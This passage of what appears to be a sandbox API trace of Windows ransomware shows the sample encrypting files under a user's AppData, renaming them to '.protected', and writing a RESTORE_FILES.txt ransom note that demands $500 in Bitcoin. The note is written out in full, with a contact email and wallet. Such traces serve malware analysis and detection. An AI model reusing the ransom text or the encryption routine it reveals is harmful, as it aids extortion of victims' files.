lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x560, lpOverlapped=0x0) returned 1 [0078.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.168] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.168] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.169] CloseHandle (hObject=0x158) returned 1 [0078.169] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.protected") returned 185 [0078.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.protected")) returned 1 [0078.169] 
FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Windows") returned -1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files") returned -1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files (x86)") returned -1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="$Recycle.bin") returned 1 [0078.170] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="System Volume Information") returned -1 [0078.170] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrIW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".protected") returned 0x0 [0078.170] lstrcmpW (lpString1="GoogleUpdateSetup.exe", lpString2="RESTORE_FILES.txt") returned -1 [0078.170] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.170] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".txt") returned 0x0 [0078.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".rar") returned 0x0 [0078.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".zip") returned 0x0 [0078.170] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.170] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.170] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.171] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.171] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.171] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.171] CloseHandle (hObject=0x158) returned 1 [0078.171] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.protected") returned 169 [0078.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.protected")) returned 1 [0078.172] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.172] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt") returned 155 [0078.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.172] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.172] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.173] 
lstrlenA (lpString="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") returned 684 [0078.173] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.173] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.173] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.174] CloseHandle (hObject=0x154) returned 1 [0078.174] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="Windows") returned -1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="Program Files") returned -1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="Program Files (x86)") returned -1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="$Recycle.bin") returned 1 [0078.174] lstrcmpiW (lpString1="manifests", lpString2="System Volume Information") returned -1 [0078.174] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests") returned 92 [0078.174] lstrcmpW (lpString1="manifests", lpString2=".") returned 1 [0078.174] lstrcmpW (lpString1="manifests", lpString2="..") returned 1 [0078.174] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*") returned 94 [0078.174] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.176] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.176] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.176] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.176] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.176] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\.") returned 94 [0078.176] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.176] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.176] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.176] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.176] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.176] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.176] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.176] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\..") returned 95 [0078.176] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.176] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.176] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="Windows") returned -1 [0078.176] lstrcmpiW 
(lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="Program Files") returned -1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.176] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="System Volume Information") returned -1 [0078.176] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.176] StrStrIW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".protected") returned 0x0 [0078.176] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.177] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.177] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.177] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".txt") returned 0x0 [0078.177] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.177] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".rar") returned 0x0 [0078.177] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0078.177] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".zip") returned 0x0 [0078.177] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.177] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.177] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.178] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, 
lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.178] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.178] CloseHandle (hObject=0x158) returned 1 [0078.178] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.protected") returned 169 [0078.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.protected")) returned 1 [0078.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="Windows") returned -1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="Program Files") returned -1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="Program Files (x86)") returned -1 
[0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="$Recycle.bin") returned 1 [0078.179] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="System Volume Information") returned -1 [0078.179] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrIW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".protected") returned 0x0 [0078.179] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrW 
(lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".txt") returned 0x0 [0078.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".rar") returned 0x0 [0078.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0078.179] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".zip") returned 0x0 [0078.179] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.180] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.180] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.180] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.180] CloseHandle (hObject=0x158) returned 1 [0078.180] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.protected") returned 171 [0078.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js 